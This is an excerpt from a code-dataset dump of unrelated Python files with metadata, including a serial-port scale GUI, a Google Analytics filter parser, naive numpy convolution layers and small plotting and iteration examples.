bot_lig]\n ax_con_list = [top_con, bot_con]\n if loud:\n print('geometric eq_list ' + str(eq_lig_list))\n print('geometric ax_list ' + str(eq_lig_list))\n if (max(ligand_counts) != 4) or (min(ligand_counts) != 2):\n if loud:\n print('not a 4-6 case')\n if (max(ligand_counts) == 6):\n if loud:\n print('6-homoleptic, 
using geo values')\n # ax=ligand_records[ligand_counts.index(6)]\n # eq_lig=ligand_records[ligand_counts.index(6)]\n else:\n if loud:\n print('monodentates not the same, using geo values ')\n print(ligand_counts)\n print(unique_ligands)\n elif n_unique_ligs == 2:\n if loud:\n print('this is a 4-6 case')\n allowed = range(0, 6)\n ax_lig_list = [i for i in allowed if (all_ligand_counts[i] == 2)]\n eq_lig_list = [i for i in allowed if (all_ligand_counts[i] == 4)]\n ax_con_list = [ligcons[i] for i in ax_lig_list]\n eq_con_list = [ligcons[i] for i in eq_lig_list]\n # ax_lig=ligand_records[ligand_counts.index(2)]\n # eq_lig=ligand_records[ligand_counts.index(4)]\n ax_ligand_list = [built_ligand_list[i] for i in ax_lig_list]\n eq_ligand_list = [built_ligand_list[i] for i in eq_lig_list]\n if loud and valid:\n print('lig_nat_list', lig_natoms_list)\n print('eq_liq is ind ', eq_lig_list)\n print('ax_liq is ind ', ax_lig_list)\n print('ax built lig [0] ext ind :' + str(built_ligand_list[ax_lig_list[0]].ext_int_dict.keys()))\n if len(ax_lig_list) > 1:\n print('ax built lig [1] ext ind :' + str(built_ligand_list[ax_lig_list[1]].ext_int_dict.keys()))\n print('eq built lig [0] ext ind: ' + str(built_ligand_list[eq_lig_list[0]].ext_int_dict.keys()))\n print('eq_con is ' + str((eq_con_list)))\n print('ax_con is ' + str((ax_con_list)))\n if name:\n for i, ax_ligand in enumerate(ax_ligand_list):\n if not os.path.isdir('ligands'):\n os.mkdir('ligands')\n ax_ligand.mol.writexyz('ligands/' + name + '_' + str(i) + '_ax.xyz')\n for i, eq_ligand in enumerate(eq_ligand_list):\n if not os.path.isdir('ligands'):\n os.mkdir('ligands')\n eq_ligand.mol.writexyz('ligands/' + name + '_' + str(i) + '_eq.xyz')\n for j, ax_con in enumerate(ax_con_list):\n ax_con_int_list.append(\n [built_ligand_list[ax_lig_list[j]].ext_int_dict[i] for i in ax_con]) # convert to interal index\n for j, eq_con in enumerate(eq_con_list):\n eq_con_int_list.append(\n [built_ligand_list[eq_lig_list[j]].ext_int_dict[i] for i in eq_con]) # convert to interal index\n if loud:\n print('int eq ' + str(eq_con_int_list))\n print('ext eq ' + str(eq_con_list))\n print('**********************************************')\n for ax_lig in ax_lig_list:\n ax_natoms_list.append(lig_natoms_list[ax_lig])\n for eq_lig in eq_lig_list:\n eq_natoms_list.append(lig_natoms_list[eq_lig])\n return ax_ligand_list, eq_ligand_list, ax_natoms_list, eq_natoms_list, ax_con_int_list, eq_con_int_list, ax_con_list, eq_con_list, built_ligand_list\n","sub_path":"molSimplify/Classes/ligand.py","file_name":"ligand.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192549748","text":"import os\nimport sys\nimport random\nimport serial\nimport time\nimport requests\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\n\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\n\nglobal new_mass,separated_mass,tare_part\nglobal id_wagi_na_serwerze\n\ntry:\n lista_argumentow = sys.argv[1].split(\"|\") \nexcept:\n try: \n print(\"Ciąg znaków:\")\n print(sys.argv[1])\n if(sys.argv[1]=='-?' or sys.argv[1]=='-help' or sys.argv[1]=='-h'):\n print('Welcome to help file')\n print('by git: MarcinanBabarzynca.')\n print('Algoritm:')\n print('1. Get string of arguments (example): '+ \"['Waga lewa piecowa|COM6|COM14|0|0']\")\n print('2. Split string \"|\" ')\n print('3. Start serial comunicator for Waga and ask question to Waga')\n print('4. 
If response is incorrect display message that there is other response or no response at all')\n print('5. Start another serial comunicator for external controller and ask question for name')\n print('6. If response is incorrect display message that there is other response or no response at all')\n print('7. If both succeed --> Start gui, set name')\n if('^' in sys.argv[1]):\n window_title = sys.argv[1].split('^')\n window_title = window_title[0]\n print('Name of Waga: \"'+window_title+'\"')\n else:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n\n if('SCALE_ID#' in sys.argv[1]):\n scale_id = sys.argv[1].split('SCALE_ID#')\n scale_id = scale_id[1].split('&')\n scale_id=scale_id[0]\n print('Identyfikator wagi: \"'+scale_id+ '\"')\n else:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n\n if('PILOT_ID#' in sys.argv[1]):\n pilot_id = sys.argv[1].split('PILOT_ID#')\n pilot_id = pilot_id[1].split('|')\n pilot_id = pilot_id[0]\n print('Identyfikator pilota użytego do tego urządzenia: \"'+pilot_id+ '\"')\n except:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n exit()\n\n \n\n\n\n\nwindow_title=lista_argumentow[0]\n\n#uchwyt pilota\n#tu jest fajne ustawienie timeoutu. W sekundach... czyli po jednej sekundzie zwróci wartość lub 0 jeżeli się nie uda odebrać danych.\n#można ustawić na 0. to wtedy otrzymamy ostatni bufor.\nscale = serial.Serial(\n port=lista_argumentow[1],\n baudrate=9600,\n timeout=0.5\n)\n\n#uchwyt pilota\npilot = serial.Serial(\n port=lista_argumentow[2],\n baudrate=9600,\n timeout=0.5\n)\n\n\nroot = tk.Tk()\nid_wagi_na_serwerze = IntVar(root,name=\"id_wagi_na_serwerze\",value=9)\nadres_serwera_i_skryptu = StringVar(root, name=\"adres_serwera_i_skryptu\", value=\"localhost/test/insert.php\")\n#?nazwa=9&dane=1213\nnew_mass = StringVar(root, name=\"new_mass\", value =\"Brak danych\")\nsended_mass = StringVar(root,name=\"sended_mass\",value = \"0\")\ntare_part = StringVar(root,name=\"tare_part\",value=\"0\")\np1 = PhotoImage(file = 'ikona_wag.png')\nroot.iconphoto(False, p1)\n#root.iconphoto(False, tk.PhotoImage(file='/path/to/ico/icon.png'))\n#root.iconbitmap('/ikona-wag.ico')\n\n\ndef update_mass():\n #tu będzie obsługa serial portu\n #new_mass = (str(random.randint(13123,1231313))+ \" g\")\n root.setvar(\"new_mass\",value = serial_read_line(scale))\n serial_clear_read_buffer(scale)\n pilot_message = serial_read_line(pilot)\n #(text=root.getvar(name=\"new_mass\"))\n if(tare_part.get()==\"1\"):\n serial_write(scale,\"C1\\r\\n\")\n tare_part.set(value=\"0\")\n stan_wagi.config(text=\"Wytarowano\")\n if(pilot_message ==(b't\\r\\n') or pilot_message ==('t')):\n print(\"Wysyłam tarowanie do wagi\")\n #tare_btnClickFunction()\n serial_write(scale,\"T\\r\\n\")\n tare_change_text()\n tare_part.set(value=\"1\")\n #masa.after(500, cd_of_tare)\n #serial_write(scale,\"C1\\r\\n\")\n if(pilot_message ==(b'w\\r\\n') or pilot_message ==('w')):\n print(\"Staram się wysłać wagę do serwera\")\n send_btnClickFunction()\n if(pilot_message ==(b'c\\r\\n') or pilot_message ==('c')):\n print(\"Wysyłam ujemną wagę do serwera\")\n minus_send_btnClickFunction()\n masa.config(text=root.getvar(name=\"new_mass\"))#root.getvar(name=\"new_mass\"))\n \n masa.after(500, update_mass)\n \n\ndef check_server_connection():\n r = requests.get('http://localhost/test/key.php?key=keykeykey')\n if(r.text == \"keykeykey\"):\n stan_wagi.config(text=\"SERWER OK\")\n else:\n stan_wagi.config(text=\"BRAK 
POŁĄCZENIA Z SERWEREM\")\n stan_wagi.after(30000, check_server_connection)\n\n\n######################################### Funkcje przycisków\n\n#Po kliknięciu wyslij\n#1. Wyswietl w konsoli info o tym że coś napisano\n#2. Wywietl mase ktora jest ostatnio odczytana i zapisana w zmiennej new_mass\ndef send_btnClickFunction():\n print(window_title+':send')\n print(new_mass.get())\n print(\"Rozpoczynam komunikacje z serwerem\")\n stan_wagi.config(text=\"Nadaje\")\n #response = requests.get('10.186.10.2/test/insert_dla_wag.php'+ \"?data=\"+str(new_mass))\n #wiadomosc = response.content\n #print(wiadomosc)\n #if(wiadomosc == \"zapisalem\"):\n # sended_mass = new_mass\n # return 1\n #else:\n # return 0\n\n\ndef tare_btnClickFunction():\n print(window_title+':tare')\n #serial_write(scale,\"C1\\r\\n\")\n serial_write(scale,\"T\\n\\r\")\n stan_wagi.config(text=\"Taruje\")\n\ndef tare_change_text():\n stan_wagi.config(text=\"Taruje\")\n\ndef minus_send_btnClickFunction():\n print(window_title+':minus_send')\n print(new_mass.get())\n print(\"Rozpoczynam komunikacje z serwerem\")\n stan_wagi.config(text=\"Cofam\")\n #response = requests.get('10.186.10.2/test/insert_dla_wag.php'+ \"?data=-\"+new_mass)\n #sended_mass = 0\n #wiadomosc = response.content\n #print(wiadomosc)\n #if(wiadomosc == \"zapisalem\"):\n # return 1\n #else:\n # return 0\n\n#########################################END Funkcje przycisków\n\n# This is the section of code which creates the main window\nroot.geometry(\"+\"+str(lista_argumentow[3])+\"+\"+str(lista_argumentow[4]))\nroot.configure(background='#ecf0f1')\nroot.title(window_title)\nroot.resizable(False, False)\n\n# This is the section of code which creates the a label\nstan_wagi = Label(root, text='Stan wagi', font=('arial', 40, 'normal'),background='#3498db')\nstan_wagi.grid(row = 0,column = 0, columnspan=3, sticky=\"\")\n############################Funkcje obsługi seriala\n\n#serial_write(\"COM2\",\"text\")\n#return 1 on success\n#return 0 on fail\ndef serial_write(obj, string):\n if(obj.write(string.encode('utf-8'))):\n return 1 #on success\n else:\n return 0 #on fail\n \n#serial_read(\"COM2\")\n#return text on success\n#return 0 on fail.\n#def serial_read(chosen_port): #return 0 if no data was readed\n# recived_string = chosen_port.readline()\ndef serial_read_line(obj):\n wiadomosc = obj.readline()\n if(wiadomosc != \"b''\"):\n if(len(wiadomosc)!=0):\n print( wiadomosc)\n wiadomosc = wiadomosc.decode(\"utf-8\") \n wiadomosc = wiadomosc.replace('\\r','')\n wiadomosc = wiadomosc.replace('\\n','')\n print('Po odkodowaniu: \"'+ wiadomosc+'\"')\n return(wiadomosc)\n \ndef serial_clear_read_buffer(obj):\n obj.reset_input_buffer()\n\n############################END Funkcje obsługi seriala\n\n\n\n\n# This is the section of code which creates the a label\nvar = StringVar()\nvar.set(\"brak odczytu\")\nmasa = Label(root, text=var, font=('arial', 40, 'normal'),anchor='e',background='#2980b9',fg='#f1c40f')\nmasa.grid(row = 3,column = 0, columnspan=3, sticky=\"e\")\n\n# Przycisk wysylania --> Komunikuj z serwerem\nwyslij_buton = Button(root, text='Wyślij', bg='#bdc3c7', font=('arial', 22, 'normal'), command=send_btnClickFunction)\nwyslij_buton.grid(row=5,column=0)\n# Przycisk tarowania --> komunikuj do wagi tarowanie\ntaruj_buton = Button(root, text='Taruj', bg='#bdc3c7', font=('arial', 22, 'normal'), command=tare_btnClickFunction)\ntaruj_buton.grid(row=5,column=1)\n# Przycisk cofania --> Nadaj stary komunikat z minusem xD\ncofnij_buton =Button(root, text='Cofnij', bg='#bdc3c7', 
font=('arial', 22, 'normal'), command=minus_send_btnClickFunction)\ncofnij_buton.grid(row=5,column=2)\n\n\ntare_part.set(value=\"0\")\n\n\nupdate_mass()\ncheck_server_connection()\nroot.mainloop()\n","sub_path":"Wagi radwag folder ostateczny/0.2/gui0.1.9.py","file_name":"gui0.1.9.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623532313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys,re, operator\n\ninFile = sys.argv[1]\nresults = [line.strip() for line in open(inFile,'r')]\ncount = 0\ndictje = dict()\n\n\nfor line in results:\n\tsplitter = line.split('\\t')[2].split(',')\n\talreadyOccured = []\n\tfor word in splitter:\n\t\tfixedWord = word.replace('#','').strip()\n\t\tif fixedWord not in alreadyOccured:\n\t\t\tif fixedWord in dictje:\n\t\t\t\tdictje[fixedWord] += 1\n\t\t\telse:\n\t\t\t\tdictje[fixedWord] = 1\t\n\t\t\talreadyOccured.append(fixedWord)\n\ncount = 0\n\nfor w in sorted(dictje, key=dictje.get, reverse=True):\n\tif count < 100:\n\t\tprint (w, dictje[w])\n\t\tcount += 1\t\t\t\n","sub_path":"calculateKeywordIDF.py","file_name":"calculateKeywordIDF.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"266618959","text":"weekdays = [\n    'Monday','Tuesday',\n    'Wednesday','Thursday','Friday'\n]\n\nfor idx, value in enumerate(weekdays):\n    print(idx, value)\n\nfor value in reversed(weekdays):\n    print(value)\n\n\nfruit = ['Apple', 'Orange', 'Banana', 'Watermelon']\ncolor = ['red', 'orange', 'yellow', 'green', 'blue']\n\nfor f, c in zip(fruit, color):\n    print('The {0} is {1}'.format(f, c))\n","sub_path":"Optum Tech/student_files 2/ch01_overview/06_iterating.py","file_name":"06_iterating.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"561764824","text":"import matplotlib.pyplot as plt  # import matplotlib.pyplot and name it plt\r\nimport numpy as np  # import numpy and name it np\r\nx=np.linspace(0,3*np.pi,100)  # take 100 points between 0 and 3*pi as the x-axis coordinates\r\ny=np.sin(x)  # y is a sine function of x\r\n\r\nplt.rcParams['font.sans-serif']=['SimHei']  # let the chart display Chinese characters\r\nplt.rcParams['axes.unicode_minus']=False  # display minus signs correctly\r\n\r\nplt.subplot(121)  # draw the first figure in row 1, column 1\r\nplt.title(r'$f(x)=sin(x)$')  # print the figure title f(x)=sin(x)\r\nplt.plot(x,y)  # plot the points (x, y)\r\nx1=[t*0.375*np.pi for t in x]  # apply t*0.375*pi to every element of x, producing a new set of x-axis coordinates\r\ny1=np.sin(x1)  # y1 is a sine function of x1\r\nplt.subplot(122)  # draw the second figure in row 1, column 2\r\nplt.title(r'$f(x)=sin(\\omega x),\\omega=\\frac{3}{8} \\pi$')  # print the figure title f(x)=sin(wx), w=3*pi/8\r\nplt.plot(x,y1)  # plot the points (x, y1)\r\nplt.show()  # show the figure on screen","sub_path":".vscode/20210519/20210519.py","file_name":"20210519.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390550087","text":"from mara_google_analytics_downloader.static import METRICS, DIMENSIONS\n\n\ndef ga_parse_filter(report_request: dict, filters: str):\n    \"\"\"\n    This function parses the URL filter syntax (v3)\n    https://developers.google.com/analytics/devguides/reporting/core/v3/reference#filters\n    to the JSON format filter syntax (v4)\n    https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering\n    https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering_2\n    and adds the filter to the report request.\n\n    Args:\n        report_request: the dict with the report request\n        filters: the filter string\n    \"\"\"\n    
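# worked example (illustrative, assuming 'ga:sessions' is in METRICS and 'ga:country' in DIMENSIONS):\n    # filters = \"ga:sessions>10;ga:country==Germany\" produces one metricFilterClauses entry\n    # (GREATER_THAN on ga:sessions) and one dimensionFilterClauses entry (EXACT on ga:country);\n    # per the v3 syntax, ';' separates AND terms and ',' separates OR terms\n    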
metric_filter_clauses = []\n    dimension_filter_clauses = []\n\n    # Reference: https://developers.google.com/analytics/devguides/reporting/core/v3/reference#filters\n    if filters.find('(') >= 0 or filters.find(')') >= 0:\n        raise Exception('Brackets in parameter --filters are not yet supported')\n\n\n    for or_filter in filters.split(','):\n        for and_filter in or_filter.split(';'):\n            filter = and_filter\n\n            # parse one filter (metric/dimension operator expression);\n            # two-character operators ('>=', '<=') must be tested before the\n            # one-character operators ('>', '<') that prefix them\n            metric_name = None\n            dimension_name = None\n            operator = None\n            operator_not = False\n            field_left = None\n            field_right = None\n            if filter.find('==') >= 0:\n                field_left = filter[:filter.find('==')]\n                field_right = filter[filter.find('==')+2:]\n                operator = 'EXACT'\n            elif filter.find('!=') >= 0:\n                field_left = filter[:filter.find('!=')]\n                field_right = filter[filter.find('!=')+2:]\n                operator = 'EXACT'\n                operator_not = True\n            elif filter.find('>=') >= 0:\n                field_left = filter[:filter.find('>=')]\n                field_right = filter[filter.find('>=')+2:]\n                operator = 'LESS_THAN'\n                operator_not = True\n            elif filter.find('<=') >= 0:\n                field_left = filter[:filter.find('<=')]\n                field_right = filter[filter.find('<=')+2:]\n                operator = 'GREATER_THAN'\n                operator_not = True\n            elif filter.find('>') >= 0:\n                field_left = filter[:filter.find('>')]\n                field_right = filter[filter.find('>')+1:]\n                operator = 'GREATER_THAN'\n            elif filter.find('<') >= 0:\n                field_left = filter[:filter.find('<')]\n                field_right = filter[filter.find('<')+1:]\n                operator = 'LESS_THAN'\n            elif filter.find('=@') >= 0:\n                field_left = filter[:filter.find('=@')]\n                field_right = filter[filter.find('=@')+2:]\n                operator = 'PARTIAL'\n            elif filter.find('!@') >= 0:\n                field_left = filter[:filter.find('!@')]\n                field_right = filter[filter.find('!@')+2:]\n                operator = 'PARTIAL'\n                operator_not = True\n            elif filter.find('=~') >= 0:\n                field_left = filter[:filter.find('=~')]\n                field_right = filter[filter.find('=~')+2:]\n                operator = 'REGEXP'\n            elif filter.find('!~') >= 0:\n                field_left = filter[:filter.find('!~')]\n                field_right = filter[filter.find('!~')+2:]\n                operator = 'REGEXP'\n                operator_not = True\n            else:\n                raise Exception(f'Filter contains no or unknown operator: {filter}')\n\n            if field_left in METRICS:\n                # Reference: https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering\n                metric_filter_clauses.append({\n                    'filters': [\n                        {\n                            'metricName': field_left,\n                            'not': operator_not,\n                            'operator': operator,\n                            'comparisonValue': field_right\n                        }\n                    ]\n                })\n            elif field_left in DIMENSIONS:\n                # Reference: https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering_2\n                dimension_filter_clauses.append({\n                    'filters': [\n                        {\n                            'dimensionName': field_left,\n                            'not': operator_not,\n                            'operator': operator,\n                            'expressions': [field_right]\n                        }\n                    ]\n                })\n            else:\n                raise Exception(f'Unknown dimension/metric: {field_left}')\n\n    if metric_filter_clauses:\n        report_request.update({\n            'metricFilterClauses': metric_filter_clauses\n        })\n    if dimension_filter_clauses:\n        report_request.update({\n            'dimensionFilterClauses': dimension_filter_clauses\n        })\n","sub_path":"mara_google_analytics_downloader/filter_parsing.py","file_name":"filter_parsing.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"338576893","text":"from keras.callbacks import Callback\n\n\nclass ValidationCallback(Callback):\n\n    def __init__(self):\n        super(ValidationCallback, self).__init__()\n        self.epoch_targets = {}\n        self.epoch_outputs = 
{}\n\n    def on_epoch_end(self, epoch, logs={}):\n        self.epoch_targets[epoch] = self.validation_data[1].argmax(axis=-1)\n        self.epoch_outputs[epoch] = self.model.predict_classes(self.validation_data[0], verbose=0)\n        return\n\n","sub_path":"SentimentAnalysis/network/validation_callback.py","file_name":"validation_callback.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52233922","text":"import numpy as np\n\ndef relu_backward(dout, cache):\n    \"\"\"\n    Computes the backward pass for ReLU\n    Input:\n    - dout: Upstream derivatives, of any shape\n    - cache: Previous input (used on forward propagation)\n\n    Returns:\n    - dx: Gradient with respect to x\n    \"\"\"\n\n    # Initialize dx with None and x with cache\n    dx, x = None, cache\n\n    # Make all positive elements in x equal to dout while all the other elements\n    # Become zero\n    dx = dout * (x >= 0)\n\n    # Return dx (gradient with respect to x)\n    return dx\n\ndef relu_forward(x):\n    \"\"\"\n    Computes the forward pass for ReLU\n    Input:\n    - x: Inputs, of any shape\n\n    Returns a tuple of: (out, cache)\n    The shape of the output is the same as the input\n    \"\"\"\n    out = None\n\n    # Create a function that receives x and returns x if x is bigger\n    # than zero, or zero if x is negative\n    relu = lambda x: x * (x > 0).astype(float)\n    out = relu(x)\n\n    # Cache input and return outputs\n    cache = x\n    return out, cache\n\ndef fc_forward(x,w,b):\n    \"\"\"\n    Computes the forward pass for an affine (fully-connected) layer.\n\n    Inputs:\n    - x: Input Tensor (N, d_1, ..., d_k)\n    - w: Weights (D, M)\n    - b: Bias (M,)\n\n    N: Mini-batch size\n    M: Number of outputs of fully connected layer\n    D: Input dimension\n    d_1, ..., d_k: Single input dimension\n\n    Returns a tuple of:\n    - out: output, of shape (N, M)\n    - cache: (x, w, b)\n    \"\"\"\n    out = None\n\n    # Get batch size (first dimension)\n    N = x.shape[0]\n\n    # Reshape activations to [Nx(d_1, ..., d_k)], which will be a 2d matrix\n    # [NxD]\n    reshaped_input = x.reshape(N, -1)\n\n    # Calculate output\n    out = np.dot(reshaped_input,w) + b.T\n\n    # Save inputs for backward propagation\n    cache = (x,w,b)\n\n    # Return outputs\n    return out, cache\n\ndef fc_backward(dout, cache):\n    \"\"\"\n    Computes the backward pass for an affine (fully-connected) layer.\n\n    Inputs:\n    - dout: Layer partial derivative wrt loss of shape (N, M) (Same as output)\n    - cache: (x,w,b) inputs from previous forward computation\n\n    N: Mini-batch size\n    M: Number of outputs of fully connected layer\n    D: Input dimension\n    d_1, ..., d_k: Single input dimension\n\n    Returns a tuple of:\n    - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n    - dw: Gradient with respect to w, of shape (D, M)\n    - db: Gradient with respect to b, of shape (M,)\n    \"\"\"\n    x, w, b = cache\n    dx, dw, db = None, None, None\n\n    # Get batch size (first dimension)\n    N = x.shape[0]\n\n    # Get dX (Same format as x)\n    dx = np.dot(dout,w.T)\n    dx = dx.reshape(x.shape)\n\n    # Get dW (Same format as w)\n    # Reshape activations to [Nx(d_1, ..., d_k)], which will be a 2d matrix\n    # [NxD]\n    reshaped_input = x.reshape(N, -1)\n    # Transpose then dot product with dout\n    dw = reshaped_input.T.dot(dout)\n\n    # Get dB (Same format as b)\n    db = np.sum(dout, axis=0)\n\n    # Return outputs\n    return dx, dw, db\n\ndef conv_forward_naive(x, w, b, conv_param):\n    \"\"\"\n    Computes the forward pass for the Convolution layer. 
(Naive)\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': How much pixels the sliding window will travel\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n N: Mini-batch size\n C: Input depth (ie 3 for RGB images)\n H/W: Image height/width\n F: Number of filters on convolution layer (Will be the output depth)\n HH/WW: Kernel Height/Width\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n out = None\n N, C, H, W = x.shape\n F, C, HH, WW = w.shape\n\n # Get parameters\n P = conv_param[\"pad\"]\n S = conv_param[\"stride\"]\n\n # Calculate output size, and initialize output volume\n H_R = 1 + (H + 2 * P - HH) / S\n W_R = 1 + (W + 2 * P - WW) / S\n out = np.zeros((N,F,H_R,W_R))\n\n # Pad images with zeros on the border (Used to keep spatial information)\n x_pad = np.lib.pad(x,((0,0),(0,0), (P,P), (P,P)), 'constant', constant_values=0)\n\n # Apply the convolution\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n out[n,depth,r/S,c/S] = np.sum(x_pad[n,:,r:r+HH,c:c+WW] * w[depth,:,:,:]) + b[depth]\n\n # Cache parameters and inputs for backpropagation and return output volume\n cache = (x, w, b, conv_param)\n return out, cache\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n Computes the backward pass for the Convolution layer. (Naive)\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n Returns a tuple of: (dw,dx,db) gradients\n \"\"\"\n dx, dw, db = None, None, None\n x, w, b, conv_param = cache\n N, F, H_R, W_R = dout.shape\n N, C, H, W = x.shape\n F, C, HH, WW = w.shape\n P = conv_param[\"pad\"]\n S = conv_param[\"stride\"]\n # Do zero padding on x_pad\n x_pad = np.lib.pad(x,((0,0),(0,0), (P,P), (P,P)), 'constant', constant_values=0)\n\n # Inititalize outputs\n dx = np.zeros(x_pad.shape)\n dw = np.zeros(w.shape)\n db = np.zeros(b.shape)\n\n # Calculate dx, with 2 extra col/row that will be deleted\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n dx[n,:,r:r+HH,c:c+WW] += dout[n,depth,r/S,c/S] * w[depth,:,:,:]\n\n #deleting padded rows to match real dx\n delete_rows = range(P) + range(H+P,H+2*P,1)\n delete_columns = range(P) + range(W+P,W+2*P,1)\n dx = np.delete(dx, delete_rows, axis=2) #height\n dx = np.delete(dx, delete_columns, axis=3) #width\n\n # Calculate dw\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(H_R): # Slide vertically taking stride into account\n for c in xrange(W_R): # Slide horizontally taking stride into account\n dw[depth,:,:,:] += dout[n,depth,r,c] * x_pad[n,:,r*S:r*S+HH,c*S:c*S+WW]\n\n # Calculate db, 1 scalar bias per filter, so it's just a matter of summing\n # all elements of dout per filter\n for depth in range(F):\n db[depth] = np.sum(dout[:, depth, :, :])\n\n return dx, dw, db\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n 
Compute the forward propagation of max pooling (naive way)\n Inputs:\n - x: 4d Input tensor , of shape (N, C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_heigh/widtht': Sliding window height/width\n - 'stride': Sliding moving distance\n N: Mini-batch size\n C: Input depth (ie 3 for RGB images)\n H/W: Image height/width\n HH/WW: Kernel Height/Width\n\n Returns a tuple of: (out, cache)\n \"\"\"\n # Get input tensor and parameter data\n N, C, H, W = x.shape\n S = pool_param[\"stride\"]\n # Consider H_P and W_P as the sliding window height and width\n H_P = pool_param[\"pool_height\"]\n W_P = pool_param[\"pool_width\"]\n\n # Calculate output size\n out = None\n HH = 1 + (H - H_P) / S\n WW = 1 + (W - W_P) / S\n out = np.zeros((N,C,HH,WW))\n\n # Calculate output (Both for loops do the same thing ....)\n #for n in xrange(N): # For each element on batch\n #for depth in xrange(C): # For each input depth\n #for r in xrange(HH): # Slide vertically\n #for c in xrange(WW): # Slide horizontally\n # Get biggest element on the window\n #out[n,depth,r,c] = np.max(x[n,depth,r*S:r*S+H_P,c*S:c*S+W_P])\n\n # Calculate output\n for n in xrange(N): # For each element on batch\n for depth in xrange(C): # For each input depth\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n # Get biggest element on the window\n out[n,depth,r/S,c/S] = np.max(x[n,depth,r:r+H_P,c:c+W_P])\n\n # Return output and save inputs and paramters to cache\n cache = (x, pool_param)\n return out, cache\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n Compute the backward propagation of max pooling (naive way)\n Inputs:\n - dout: Upstream derivatives, same size as cached x\n - cache: A tuple of (x, pool_param) as in the forward pass.\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n # Get data back from cache\n x, pool_param = cache\n\n # Get input tensor and parameter\n N, C, H, W = x.shape\n S = pool_param[\"stride\"]\n H_P = pool_param[\"pool_height\"]\n W_P = pool_param[\"pool_width\"]\n N,C,HH,WW = dout.shape\n\n # Inititalize dx\n dx = None\n dx = np.zeros(x.shape)\n\n # Calculate dx (mask * dout)\n for n in xrange(N): # For each element on batch\n for depth in xrange(C): # For each input depth\n for r in xrange(HH): # Slide vertically (use stride on the fly)\n for c in xrange(WW): # Slide horizontally (use stride on the fly)\n # Get window and calculate the mask\n x_pool = x[n,depth,r*S:r*S+H_P,c*S:c*S+W_P]\n mask = (x_pool == np.max(x_pool))\n # Calculate mask*dout\n dx[n,depth,r*S:r*S+H_P,c*S:c*S+W_P] = mask*dout[n,depth,r,c]\n\n # Return dx\n return dx\n","sub_path":"python_reference_code/book_ai/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597702569","text":"from game import *\nimport csv\nfrom nlattice import normalize\nfrom os import listdir\nfrom aggregate import agg, get_last_row\n\nresult_dir = '../../Results/b3/'\nstudy_name = 'b3'\n\ndim = 75\ndepth = 3\nmax_age = 2 * 10 ** 7\ncutoff_frac = 0.1\ngeom = \"torus\"\nmax_death = 2 #specific to game / parameter regime, most things we expect to coexist\ncutoff = cutoff_frac * dim ** depth\n\n\nwith open(result_dir + study_name +'-settings.txt', 'w') as summary_file:\n\tsummary_file.write(\"\"\"\n\t\tdim: %d\n\t\tdepth: %d \n\t\tmax_age: %.3g\n\t\tcutoff: %f\n\t\tgeom: %s\n\t\tpayoff: [[0,c/2,k-n],[1/2-c, 0, 1/2 + k - 
